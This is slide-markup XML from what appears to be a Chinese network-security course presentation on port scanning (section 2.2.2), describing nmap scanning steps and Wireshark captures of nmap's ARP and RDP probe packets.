        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行指定端口扫描并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤一</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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4" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 端口扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5568950" y="1454785"/>
            <a:ext cx="5080000" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2.Wireshark发现nmap数据包如图2-2-35所示。通过分析结果可以发现，nmap发送一个ARP数据包来探测对方主机是否存活。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5568950" y="2376805"/>
            <a:ext cx="5276850" cy="2324100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="文本框 101"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5568950" y="4700905"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-35 Wireshark发现nmap数据包</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="638810"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="639173"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行指定端口扫描并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤一</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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4" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 端口扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="文本框 101"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5554345" y="1083628"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3.查看nmap对RDP服务发送的嗅探包，如图2-2-36所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
